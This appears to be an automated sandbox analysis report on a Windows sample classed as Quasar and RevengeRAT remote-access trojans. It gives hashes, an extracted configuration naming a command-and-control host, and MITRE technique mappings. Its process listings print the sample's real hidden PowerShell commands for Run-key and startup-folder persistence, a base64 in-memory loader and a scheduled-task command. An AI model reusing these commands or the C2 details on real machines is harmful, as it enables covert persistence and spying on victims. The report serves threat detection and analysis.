quasar | beb2a7c0eaa4c35c9f9a699417c395d78e9e76ffc790c40e7a0987b8044577e0

General

Target

87756bf702699c3df85d5e2f773308ea_JaffaCakes118.exe
Size

1.4MB
MD5

87756bf702699c3df85d5e2f773308ea
SHA1

b8797a64796649605e138b45bc5112a07329f1df
SHA256

beb2a7c0eaa4c35c9f9a699417c395d78e9e76ffc790c40e7a0987b8044577e0
SHA512

f16c78308f8686e2cc28408b5265e710ffbe389161ef5c9df9f454c62f5a88c8ae207e859bd6ffa6b990944911b534c7085f70e9bd30e89ad407262d8a91c293
SSDEEP

24576:JAHnh+eWsN3skA4RV1Hom2KXMmHawWv769AZEeFxD3140je8211Wxv14Rf995:Qh+ZkldoPK8Yaw4D1FxRZJgp

Score

10^/10

quasar revengerat office04 execution persistence spyware stealer trojan

Malware Config

Extracted

Family

revengerat

Mutex

Extracted

Family

quasar

Version

1.4.0.0

Botnet

Office04

C2

brave.webredirect.org:5467

Mutex

Xa8hxCQyVS1H1Wdqe8

Attributes

encryption_key
BLgRDyrND0s3i7A4nwYc
install_name
Micsoft.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Micsoft
subdirectory
Micsoft Updata

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4052-96-0x0000000000400000-0x000000000044E000-memory.dmp	family_quasar

RevengeRAT
Remote-access trojan with a wide range of capabilities.
trojan revengerat

RevengeRat Executable 1 IoCs

stealer

Processes:

resource	yara_rule
behavioral2/memory/5136-86-0x00000000077E0000-0x00000000077E8000-memory.dmp	revengerat

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid process

4260 powershell.exe
5304 powershell.exe
184 powershell.exe
5136 powershell.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

87756bf702699c3df85d5e2f773308ea_JaffaCakes118.exeWScript.exewscript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	87756bf702699c3df85d5e2f773308ea_JaffaCakes118.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	wscript.exe

Drops startup file 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft_FrameWork.js powershell.exe
Executes dropped EXE 3 IoCs

Processes:

dllhost.exedllhost.exeMicsoft.exe

pid process

4892 dllhost.exe
4052 dllhost.exe
1960 Micsoft.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft_FrameWork.js	powershell.exe

pid	process
4892	dllhost.exe
4052	dllhost.exe
1960	Micsoft.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\FrameWork = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Microsoft_FrameWork.js"	powershell.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

64 ip-api.com
Suspicious use of SetThreadContext 1 IoCs

Processes:

dllhost.exe

description pid process target process

PID 4892 set thread context of 4052 4892 dllhost.exe dllhost.exe
Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

2148 schtasks.exe

flow	ioc
64	ip-api.com

description	pid	process	target process
PID 4892 set thread context of 4052	4892	dllhost.exe	dllhost.exe

pid	process
2148	schtasks.exe

Modifies registry class 1 IoCs

Processes:

87756bf702699c3df85d5e2f773308ea_JaffaCakes118.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings	87756bf702699c3df85d5e2f773308ea_JaffaCakes118.exe

Suspicious behavior: EnumeratesProcesses 13 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exedllhost.exe

pid	process
4260	powershell.exe
4260	powershell.exe
5304	powershell.exe
5304	powershell.exe
184	powershell.exe
184	powershell.exe
5304	powershell.exe
184	powershell.exe
5136	powershell.exe
5136	powershell.exe
5136	powershell.exe
4892	dllhost.exe
4892	dllhost.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exedllhost.exedllhost.exe

description	pid	process
Token: SeDebugPrivilege	4260	powershell.exe
Token: SeDebugPrivilege	5304	powershell.exe
Token: SeDebugPrivilege	184	powershell.exe
Token: SeDebugPrivilege	5136	powershell.exe
Token: SeDebugPrivilege	4892	dllhost.exe
Token: SeDebugPrivilege	4052	dllhost.exe

Suspicious use of WriteProcessMemory 35 IoCs

Processes:

87756bf702699c3df85d5e2f773308ea_JaffaCakes118.exeWScript.exepowershell.exewscript.exedllhost.exedllhost.exe

description	pid	process	target process
PID 5796 wrote to memory of 4892	5796	87756bf702699c3df85d5e2f773308ea_JaffaCakes118.exe	dllhost.exe
PID 5796 wrote to memory of 4892	5796	87756bf702699c3df85d5e2f773308ea_JaffaCakes118.exe	dllhost.exe
PID 5796 wrote to memory of 4892	5796	87756bf702699c3df85d5e2f773308ea_JaffaCakes118.exe	dllhost.exe
PID 5796 wrote to memory of 1196	5796	87756bf702699c3df85d5e2f773308ea_JaffaCakes118.exe	WScript.exe
PID 5796 wrote to memory of 1196	5796	87756bf702699c3df85d5e2f773308ea_JaffaCakes118.exe	WScript.exe
PID 5796 wrote to memory of 1196	5796	87756bf702699c3df85d5e2f773308ea_JaffaCakes118.exe	WScript.exe
PID 1196 wrote to memory of 4260	1196	WScript.exe	powershell.exe
PID 1196 wrote to memory of 4260	1196	WScript.exe	powershell.exe
PID 1196 wrote to memory of 4260	1196	WScript.exe	powershell.exe
PID 4260 wrote to memory of 5064	4260	powershell.exe	wscript.exe
PID 4260 wrote to memory of 5064	4260	powershell.exe	wscript.exe
PID 4260 wrote to memory of 5064	4260	powershell.exe	wscript.exe
PID 5064 wrote to memory of 5304	5064	wscript.exe	powershell.exe
PID 5064 wrote to memory of 5304	5064	wscript.exe	powershell.exe
PID 5064 wrote to memory of 5304	5064	wscript.exe	powershell.exe
PID 5064 wrote to memory of 184	5064	wscript.exe	powershell.exe
PID 5064 wrote to memory of 184	5064	wscript.exe	powershell.exe
PID 5064 wrote to memory of 184	5064	wscript.exe	powershell.exe
PID 5064 wrote to memory of 5136	5064	wscript.exe	powershell.exe
PID 5064 wrote to memory of 5136	5064	wscript.exe	powershell.exe
PID 5064 wrote to memory of 5136	5064	wscript.exe	powershell.exe
PID 4892 wrote to memory of 4052	4892	dllhost.exe	dllhost.exe
PID 4892 wrote to memory of 4052	4892	dllhost.exe	dllhost.exe
PID 4892 wrote to memory of 4052	4892	dllhost.exe	dllhost.exe
PID 4892 wrote to memory of 4052	4892	dllhost.exe	dllhost.exe
PID 4892 wrote to memory of 4052	4892	dllhost.exe	dllhost.exe
PID 4892 wrote to memory of 4052	4892	dllhost.exe	dllhost.exe
PID 4892 wrote to memory of 4052	4892	dllhost.exe	dllhost.exe
PID 4892 wrote to memory of 4052	4892	dllhost.exe	dllhost.exe
PID 4052 wrote to memory of 2148	4052	dllhost.exe	schtasks.exe
PID 4052 wrote to memory of 2148	4052	dllhost.exe	schtasks.exe
PID 4052 wrote to memory of 2148	4052	dllhost.exe	schtasks.exe
PID 4052 wrote to memory of 1960	4052	dllhost.exe	Micsoft.exe
PID 4052 wrote to memory of 1960	4052	dllhost.exe	Micsoft.exe
PID 4052 wrote to memory of 1960	4052	dllhost.exe	Micsoft.exe

C:\Users\Admin\AppData\Local\Temp\87756bf702699c3df85d5e2f773308ea_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\87756bf702699c3df85d5e2f773308ea_JaffaCakes118.exe"
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:5796

C:\Users\Admin\AppData\Roaming\Z38459586\dllhost.exe
"C:\Users\Admin\AppData\Roaming\Z38459586\dllhost.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4892

C:\Users\Admin\AppData\Roaming\Z38459586\dllhost.exe
C:\Users\Admin\AppData\Roaming\Z38459586\dllhost.exe
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4052

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "Micsoft" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Z38459586\dllhost.exe" /rl HIGHEST /f
4⤵
- Creates scheduled task(s)
PID:2148

C:\Users\Admin\AppData\Roaming\Micsoft Updata\Micsoft.exe
"C:\Users\Admin\AppData\Roaming\Micsoft Updata\Micsoft.exe"
4⤵
- Executes dropped EXE
PID:1960

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Z38459586\Microsoft_FrameWork.js"
2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1196

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('Temp')+'\Microsoft_FrameWork.js',[System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Roaming\Z38459586\Microsoft_FrameWork.js'));wscript 'C:\Users\Admin\AppData\Local\Temp\Microsoft_FrameWork.js'"
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4260

C:\Windows\SysWOW64\wscript.exe
"C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\Microsoft_FrameWork.js
4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5064

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'FrameWork' -value 'C:\Users\Admin\AppData\Local\Temp\Microsoft_FrameWork.js' -PropertyType String -Force;"
5⤵
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5304

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\Microsoft_FrameWork.js',[System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\Microsoft_FrameWork.js'))"
5⤵
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:184

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'Mircosoft').Mircosoft;$_b=$_b.replace('$','5');[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5136

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

2

T1059

JavaScript

1

T1059.007

PowerShell

Scheduled Task/Job

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

Scheduled Task/Job

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

Scheduled Task/Job

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\dllhost.exe.log

Filesize
418B

MD5
1439db7996c841101009567fdc3f956a

SHA1
746414426c3c0aa5912cd1602951f5a980d09bc8

SHA256
e7bbc9d040c7ea8f121033625bb66c3d86823246793833298d3e70bd4327bf6d

SHA512
f68a97425091cdcd0fd1d617c3a0d91908b0b39ff9a156fa802598582f3368bd0df624163fc2cbbd0851d88c342c690e9cc1decd80e7023337debb61cf11eea9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
3337d66209faa998d52d781d0ff2d804

SHA1
6594b85a70f998f79f43cdf1ca56137997534156

SHA256
9b946b062865f68b9f0f43a011d33d7ea0926a3c8f78fb20d9cab6144314e1bd

SHA512
8bbd14bd73111f7b55712f5d1e1b727e41db8e6e0c1243ee6809ff32b509e52dec7af34c064151fb5beccd59dda434a3f83abe987c561a25abfbb4cbcf9c7f1f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
eec69f1a7eff9b5f29366da620e7de88

SHA1
be3b8ae89646aa781dfeb338ecf1b10a8c0c6060

SHA256
ffc642634c4337f759852084b94b5bbbb247285d16408d4bec65f240004af5c2

SHA512
70d7184fdd97388eb5eeeab2fb716e96a1a4d3a4339e83e98a9b2ca3621c19d379936a108b49d11da971cc428683835f44fc21c59ffb014e3fb5f19c07aa5061

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
86a6568d57f478e810b0d93b7981c21f

SHA1
b2d7169247eff9219b7b78a8011195e16eb930c6

SHA256
4d7898c74896e7abc6ee5516fc6a031d052981cde3187ca17bcf5844dd6292dc

SHA512
fa72a88490d155c63a8f6ba983cd23ad1ee0dd6dbfec7035ea51e1bfa0cd85b206cac03751787333bfebbffb50073a77f107d4b4cade7c9a55bb96eb1643c3d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\Microsoft_FrameWork.js

Filesize
276KB

MD5
bad746b2c3eb5e28a5427dcb9445a32e

SHA1
b5b8bddb70d077c6e4eab1a84194891a794c8e53

SHA256
9ca651e13069c71c4a7f2996a37124631d60f97c8452db265ba637407e5d91b3

SHA512
b2264c0a06653d0837ca332a0f1171463228a73de481eb52313673046dc55d1197bc3844ea98afae21d4d34c526b1f6e4ed9c3576a10b0c7e3133396c235e282

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_aop5uxlg.uce.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\aut4297.tmp

Filesize
459KB

MD5
75b65ee1a46049300503dac6643dd0f8

SHA1
f66b5f9e8a2a7b67112c9249f835937940c31853

SHA256
e8d44052a747d3eb92af3ee59a9cdb98179070acb935dc82b5fee5b9fdacb5de

SHA512
c81ec8d673b578456296a7b68a52a1ea707fa3de6cfbf754721e1ebf8c5fac98e3a4718dcf7deafade2bf358494e731db13844e0078cf0ee3662d44794236edb

Download Submit
C:\Users\Admin\AppData\Roaming\Z38459586\Microsoft_FrameWork.js

Filesize
505KB

MD5
927c3d9494f9c1faa027856471bcc203

SHA1
6de359b354a8f6abd34336c12445ee2fb6e32339

SHA256
397dffec327af9b5b835670f674d7aee11044a018ab7e02347625fde0b3af48f

SHA512
be89738dc3ed6fbca0ecbb037bc166002598fc424fd8a13cecc2d2ac5df08887d9a5c2812ca6fc9fe018bfed06ea9d0a9136d047713812342f2612d1a35a62a7

Download Submit
memory/4052-103-0x0000000006C20000-0x0000000006C5C000-memory.dmp

Filesize
240KB

Download
memory/4052-102-0x00000000065A0000-0x00000000065B2000-memory.dmp

Filesize
72KB

Download
memory/4052-101-0x00000000058E0000-0x0000000005972000-memory.dmp

Filesize
584KB

Download
memory/4052-96-0x0000000000400000-0x000000000044E000-memory.dmp

Filesize
312KB

Download
memory/4260-32-0x00000000051A0000-0x00000000057C8000-memory.dmp

Filesize
6.2MB

Download
memory/4260-33-0x0000000005870000-0x0000000005892000-memory.dmp

Filesize
136KB

Download
memory/4260-45-0x0000000005BF0000-0x0000000005F44000-memory.dmp

Filesize
3.3MB

Download
memory/4260-46-0x0000000006110000-0x000000000612E000-memory.dmp

Filesize
120KB

Download
memory/4260-47-0x0000000006140000-0x000000000618C000-memory.dmp

Filesize
304KB

Download
memory/4260-48-0x00000000066B0000-0x00000000066F4000-memory.dmp

Filesize
272KB

Download
memory/4260-34-0x0000000005A10000-0x0000000005A76000-memory.dmp

Filesize
408KB

Download
memory/4260-51-0x0000000007480000-0x00000000074F6000-memory.dmp

Filesize
472KB

Download
memory/4260-52-0x0000000007B80000-0x00000000081FA000-memory.dmp

Filesize
6.5MB

Download
memory/4260-53-0x0000000007430000-0x000000000744A000-memory.dmp

Filesize
104KB

Download
memory/4260-35-0x0000000005A80000-0x0000000005AE6000-memory.dmp

Filesize
408KB

Download
memory/4260-31-0x00000000027C0000-0x00000000027F6000-memory.dmp

Filesize
216KB

Download
memory/4892-95-0x0000000005320000-0x0000000005388000-memory.dmp

Filesize
416KB

Download
memory/4892-28-0x0000000004C60000-0x0000000004CD2000-memory.dmp

Filesize
456KB

Download
memory/4892-24-0x0000000072DBE000-0x0000000072DBF000-memory.dmp

Filesize
4KB

Download
memory/4892-87-0x0000000072DB0000-0x0000000073560000-memory.dmp

Filesize
7.7MB

Download
memory/4892-26-0x00000000003A0000-0x0000000000418000-memory.dmp

Filesize
480KB

Download
memory/4892-27-0x0000000072DB0000-0x0000000073560000-memory.dmp

Filesize
7.7MB

Download
memory/4892-29-0x0000000004E30000-0x0000000004EA0000-memory.dmp

Filesize
448KB

Download
memory/4892-72-0x0000000072DBE000-0x0000000072DBF000-memory.dmp

Filesize
4KB

Download
memory/4892-30-0x0000000004F40000-0x0000000004FDC000-memory.dmp

Filesize
624KB

Download
memory/4892-100-0x0000000072DB0000-0x0000000073560000-memory.dmp

Filesize
7.7MB

Download
memory/5136-86-0x00000000077E0000-0x00000000077E8000-memory.dmp

Filesize
32KB

Download
memory/5304-76-0x0000000007580000-0x0000000007B24000-memory.dmp

Filesize
5.6MB

Download
memory/5304-74-0x0000000006030000-0x0000000006052000-memory.dmp

Filesize
136KB

Download
memory/5304-73-0x0000000006F30000-0x0000000006FC6000-memory.dmp

Filesize
600KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads